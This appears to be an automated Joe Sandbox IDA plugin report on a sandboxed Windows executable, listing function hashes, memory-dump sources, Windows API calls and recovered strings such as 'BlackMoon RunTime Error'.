                                                                • Opcode ID: af644d9e3f659b8162586e3ee1808d896a842c2b232fe85db50f68c1c17d5ce5
                                                                • Instruction ID: 3f026d91d39ee0c66ed9fe7b035bc24c3f1e421d50e1a862b4122b13ab58957f
                                                                • Opcode Fuzzy Hash: af644d9e3f659b8162586e3ee1808d896a842c2b232fe85db50f68c1c17d5ce5
                                                                • Instruction Fuzzy Hash: 0D116574900508EBEF10DF54CD45BAD7B74EB00341F244166FD15AB292D37A9F49EB4A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: 6392f2c3bda95c93dfc5f9fedbd97216359108170702447cffdf55b14ad8dd39
                                                                • Instruction ID: 1072e3adf2cf8a355f7c4df6a80339700b47d5ba5b075181fdd6e4c11a07bde4
                                                                • Opcode Fuzzy Hash: 6392f2c3bda95c93dfc5f9fedbd97216359108170702447cffdf55b14ad8dd39
                                                                • Instruction Fuzzy Hash: 05F0F970D4020DFBDF10DF90D949BAEBB74AB05304F10805AE9143B280D3BA5B55DB99
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: 80ee70c4bddbd9c84fdf94d55b64495f5953b9dfd9420b64b8fa6ea3e3ac397d
                                                                • Instruction ID: fb54b5cfa710bed239f57f0f90189a1970ff8d0794ecf2de45cb18a480a5d5d5
                                                                • Opcode Fuzzy Hash: 80ee70c4bddbd9c84fdf94d55b64495f5953b9dfd9420b64b8fa6ea3e3ac397d
                                                                • Instruction Fuzzy Hash: DCF08971E4420CBBEB109E91DC06BBD7734A762710F104066B9047A1C0D3B59A659B9A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: a50c453d697574feb94a09f9f554245613ce8b8810cc3df339ec77bcc0e5ffce
                                                                • Instruction ID: 3db76c60c5095f66912579045577ec3cdbf781c9bb764c4223c9c4fc00431333
                                                                • Opcode Fuzzy Hash: a50c453d697574feb94a09f9f554245613ce8b8810cc3df339ec77bcc0e5ffce
                                                                • Instruction Fuzzy Hash: B0F05E30E4420CBBDB109E90DC06FAD7735E705701F004166BA147A1D1D2B9AA78AB8B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: d9ac494e1ce11ac9986c5a6d512d47909e1fd901ec1e7412aebdcf95b15b834a
                                                                • Instruction ID: cc31a23c21e7dc048fbd0017422997f696afaacd6ec3918ddef5f261499636e6
                                                                • Opcode Fuzzy Hash: d9ac494e1ce11ac9986c5a6d512d47909e1fd901ec1e7412aebdcf95b15b834a
                                                                • Instruction Fuzzy Hash: 23F0E270E4120CBBFB009E40DC02FADB735AB15310F00902ABA002A1C0DA798A60AB8B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: 1142ed627ada3a12f0cd6849080277eff928dacbad93db00df7f111eac2f492f
                                                                • Instruction ID: e9528640cfaab891071702431fc3e4a20d5eccc85a407dcb4846942cee2f3351
                                                                • Opcode Fuzzy Hash: 1142ed627ada3a12f0cd6849080277eff928dacbad93db00df7f111eac2f492f
                                                                • Instruction Fuzzy Hash: 6EF0FE75D41308FBDB109F91DC06FADBB75AB09710F10905AFA047A2D0D7759A209F99
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: aae5679873c5506e551f42af981098a87ccbddb65a292451e118bf4b269d162b
                                                                • Instruction ID: c9f7f737d74bd1c6d358f6228013bd7c8666acdc836df72276170e41e22e3c28
                                                                • Opcode Fuzzy Hash: aae5679873c5506e551f42af981098a87ccbddb65a292451e118bf4b269d162b
                                                                • Instruction Fuzzy Hash: 44F05E74D00308FBDB10AFA1DC06BADBB39AB05304F1090AAF5043A291D6BA4A609F89
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: 9fe81dedbfcd2174f6154b5b6fd8dae5e5a8dad72efc98798b60def56f5890e7
                                                                • Instruction ID: e500985746a9fe3ca70c4d0cd506a391274b7707470178f656c54414a42306b8
                                                                • Opcode Fuzzy Hash: 9fe81dedbfcd2174f6154b5b6fd8dae5e5a8dad72efc98798b60def56f5890e7
                                                                • Instruction Fuzzy Hash: 14E0D879E41308A3E7109F50DE4BF2AB3789711711F04406AFD0467280E5B5EA2495AB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: d66510b206ec2416981273afcf70c09afb7c1fb8e13a807ed660e913d836717c
                                                                • Instruction ID: bac935a9c5eb7da8e07ff5bb85c70e6b9ee1fbbc89105cce866c1b972069e4f4
                                                                • Opcode Fuzzy Hash: d66510b206ec2416981273afcf70c09afb7c1fb8e13a807ed660e913d836717c
                                                                • Instruction Fuzzy Hash: 45E08C34D0420CB7D7006E50DE06B6DBB39AB06311F809016BE043A190E6B65A35AB9A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Opcode ID: d1a507b683d1118576883746d5a459159f13c1a8f56beba4b5ca9e710f79f979
                                                                • Instruction ID: c8f33695b5a87f5872326ded8e0a488a61eb4946b9b9918bd28658611c9fc565
                                                                • Opcode Fuzzy Hash: d1a507b683d1118576883746d5a459159f13c1a8f56beba4b5ca9e710f79f979
                                                                • Instruction Fuzzy Hash: 8CD05E74A05248DBC711DF88C200768B7B4EB01300F2040E0D90957301D3746E009645
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,006A9C88,00000104), ref: 0042E5DE
                                                                • __ftol.LIBCMT ref: 0042E72E
                                                                • GetCommandLineA.KERNEL32 ref: 0042E754
                                                                • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042E7C1
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0042E7F3
                                                                • TranslateMessage.USER32(?), ref: 0042E7FA
                                                                • DispatchMessageA.USER32(?), ref: 0042E801
                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042E810
                                                                • wsprintfA.USER32 ref: 0042EA53
                                                                • MessageBoxA.USER32(00000000,?,blackmoon,00000010), ref: 0042EA6A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate__ftolwsprintf
                                                                • String ID: BlackMoon RunTime Error:%s$ERROR$blackmoon
                                                                • API String ID: 2186951270-532175377
                                                                • Opcode ID: 4f24574583d3adc933dd12c285e35e8bacf5df187271773de9a23c6789fac387
                                                                • Instruction ID: 293538c6dadbe7963358de68bd32b884ea8d35a61c1b05468d2fd594fe02bea9
                                                                • Opcode Fuzzy Hash: 4f24574583d3adc933dd12c285e35e8bacf5df187271773de9a23c6789fac387
                                                                • Instruction Fuzzy Hash: 82C1363378451446E324E669FC81BFFB781E7D1332F94053BEA05CA2D0D86F9909CA6A
                                                                APIs
                                                                • VariantClear.OLEAUT32(?), ref: 004CE78A
                                                                • VariantInit.OLEAUT32(?), ref: 004CE791
                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 004CE7D2
                                                                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 004CE7EC
                                                                • SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 004CE7F9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$BoundVariant$ClearInit
                                                                • String ID:
                                                                • API String ID: 3354131989-0
                                                                • Opcode ID: c82c5b56e127194de1485bf7b56ea60036703373f7be35a9e4f34284765439f2
                                                                • Instruction ID: c91ac82dd30458459fe3d8399b3380468369ff41e9e82e541b862c4b0cf96d75
                                                                • Opcode Fuzzy Hash: c82c5b56e127194de1485bf7b56ea60036703373f7be35a9e4f34284765439f2
                                                                • Instruction Fuzzy Hash: 547191BA6083449FD344DF6AD88496BB7E9FFC8324F44492EF889C7210E739D9098B55
                                                                APIs
                                                                • VariantClear.OLEAUT32(?), ref: 0042AD1A
                                                                • VariantInit.OLEAUT32(?), ref: 0042AD21
                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 0042AD62
                                                                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 0042AD7C
                                                                • SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 0042AD89
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$BoundVariant$ClearInit
                                                                • String ID:
                                                                • API String ID: 3354131989-0
                                                                • Opcode ID: 702529b4935648623135f13163b348283d5b88ba391659994ae87d2da4aad167
                                                                • Instruction ID: cf97423ae663a66b0eaa756a5415e7036394d20cb83c9b97a5b86340537d32b4
                                                                • Opcode Fuzzy Hash: 702529b4935648623135f13163b348283d5b88ba391659994ae87d2da4aad167
                                                                • Instruction Fuzzy Hash: 5961F2726083559BC300DF65EC849ABF7E8FBC8325F84482EFD44C6210E739D9098BA6
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004DE2E0), ref: 004DE59A
                                                                • GetStdHandle.KERNEL32(000000F4,004EA8FC,00000000,00000000,00000000,004DE2E0), ref: 004DE670
                                                                • WriteFile.KERNEL32(00000000), ref: 004DE677
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$HandleModuleNameWrite
                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $Xij$ij
                                                                • API String ID: 3784150691-327600375
                                                                • Opcode ID: 600661cb0ffbd6a33923be722bd2eb9ba801d3c247ab3288e0621749d95ca6b4
                                                                • Instruction ID: a5f026f0d9a935fd8cf7686c740ba97c963296b41d7d8075ef06ae9c4775ae3b
                                                                • Opcode Fuzzy Hash: 600661cb0ffbd6a33923be722bd2eb9ba801d3c247ab3288e0621749d95ca6b4
                                                                • Instruction Fuzzy Hash: 85313B72600258AFDF10F7A2DC46FDA376DEF82345F54085BF540DA241E678EA44CB2A
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?), ref: 0042EB02
                                                                • LoadLibraryA.KERNEL32(?), ref: 0042EB0F
                                                                • wsprintfA.USER32 ref: 0042EB26
                                                                • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 0042EB3C
                                                                  • Part of subcall function 00429D10: ExitProcess.KERNEL32 ref: 00429D25
                                                                • GetProcAddress.KERNEL32(00000000,00000040), ref: 0042EBD1
                                                                • wsprintfA.USER32 ref: 0042EBE9
                                                                • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 0042EBFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcess
                                                                • String ID: DLL ERROR
                                                                • API String ID: 1172160414-4092134112
                                                                • Opcode ID: 221ac441efe6667022ee75c6cb58662b397017cdb86f809399458931576f0568
                                                                • Instruction ID: 982f2e9db16c3ffd4728f1e1469edc06c825a5c4cc6ba52fd089536732514696
                                                                • Opcode Fuzzy Hash: 221ac441efe6667022ee75c6cb58662b397017cdb86f809399458931576f0568
                                                                • Instruction Fuzzy Hash: 2A3127B27043555FD320DF25AC85B5BBB98EB84714F40492AFB0697242EB78A809C7AD
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,004DE651,?,Microsoft Visual C++ Runtime Library,00012010,?,004EA8FC,?,004EA94C,?,?,?,Runtime Error!Program: ), ref: 004E4861
                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004E4879
                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004E488A
                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004E4897
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad
                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                • API String ID: 2238633743-4044615076
                                                                • Opcode ID: 52491bf5373f9b551283c80453ca4401a279df1d94c98eed83935aedbd0d63e9
                                                                • Instruction ID: 058d0ad15094c119a8e50aff4c9d36bab79b1276b53c0703471523d40a59b2d6
                                                                • Opcode Fuzzy Hash: 52491bf5373f9b551283c80453ca4401a279df1d94c98eed83935aedbd0d63e9
                                                                • Instruction Fuzzy Hash: 4A01B1756003D1EF9711AFB69CC4D673BEABB85B42714153BB201C2260DB3C9851CB39
                                                                APIs
                                                                • LoadTypeLib.OLEAUT32(00000000,?), ref: 0042CE08
                                                                • GetUserDefaultLCID.KERNEL32(00000000,?,0000091C,00000000,00000000,00010030,Adodb.Stream,00000000,80000004,00000000,00000000,00000000), ref: 0042CE17
                                                                • LHashValOfNameSys.OLEAUT32(00000001,00000000), ref: 0042CE20
                                                                • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0042CE86
                                                                • CLSIDFromProgID.COMBASE(00000000,?), ref: 0042CEC7
                                                                • CLSIDFromString.COMBASE(00000000,?), ref: 0042CEDA
                                                                • CoCreateInstance.COMBASE(?,00000000,00000017,004EA5F0,?), ref: 0042CF15
                                                                • CoCreateInstance.COMBASE(?,00000000,00000007,004EA5F0,?), ref: 0042CF33
                                                                • OleRun.OLE32(?), ref: 0042CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFromInstanceType$DefaultHashLoadNameProgRegisterStringUser
                                                                • String ID:
                                                                • API String ID: 458303785-0
                                                                • Opcode ID: bbf10cfc526b89318b59cb90c08e93cdaf915e3ce7c049e67a6979c19d307fe3
                                                                • Instruction ID: 10d79731ac223f1b8c26979441e355dd4191d18913a1c279e56b4dfe62169c86
                                                                • Opcode Fuzzy Hash: bbf10cfc526b89318b59cb90c08e93cdaf915e3ce7c049e67a6979c19d307fe3
                                                                • Instruction Fuzzy Hash: 8F517DB1604315AFC210DF65ECC496FB7E8EB88714F41492EF549C7201E739E9498BAA
                                                                APIs
                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 0042A5CA
                                                                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 0042A5E6
                                                                • SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 0042A5F3
                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 0042A64A
                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0042A683
                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 0042A6B6
                                                                • SafeArrayGetElemsize.OLEAUT32(00000000), ref: 0042A6CA
                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0042A6EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$Data$AccessBoundUnaccess$Elemsize
                                                                • String ID:
                                                                • API String ID: 3535882829-0
                                                                • Opcode ID: 5b48fcd4ae437c339932c4fb1ea066e9bc054e8f04fc0b2f354a155db00d7b46
                                                                • Instruction ID: 853b402a566193894561e6386f2e38829b47c6b346f4e9e453f6705d66a4d6ad
                                                                • Opcode Fuzzy Hash: 5b48fcd4ae437c339932c4fb1ea066e9bc054e8f04fc0b2f354a155db00d7b46
                                                                • Instruction Fuzzy Hash: EF41A1366042149FC704DF15EC84AABBBA5FBC8310F48852EFD498B311D734E94ACB96
                                                                APIs
                                                                • SafeArrayAllocDescriptor.OLEAUT32(00000001,?), ref: 004CE625
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 004CE64D
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004CE661
                                                                • SafeArrayDestroy.OLEAUT32(?), ref: 004CE670
                                                                • SysAllocString.OLEAUT32(00000000), ref: 004CE6A9
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004CE720
                                                                • VariantClear.OLEAUT32(?), ref: 004CE72B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$AllocData$AccessClearDescriptorDestroyStringUnaccessVariant
                                                                • String ID:
                                                                • API String ID: 959405800-0
                                                                • Opcode ID: 5620cda6693a4cd40d520bf80e32b317f16263d67d42ca3a774dc92ed3f3f63c
                                                                • Instruction ID: b29e7a64f478f06af6ebfe4fad5933cf2c75ab083553736dc1894009af8ef3a0
                                                                • Opcode Fuzzy Hash: 5620cda6693a4cd40d520bf80e32b317f16263d67d42ca3a774dc92ed3f3f63c
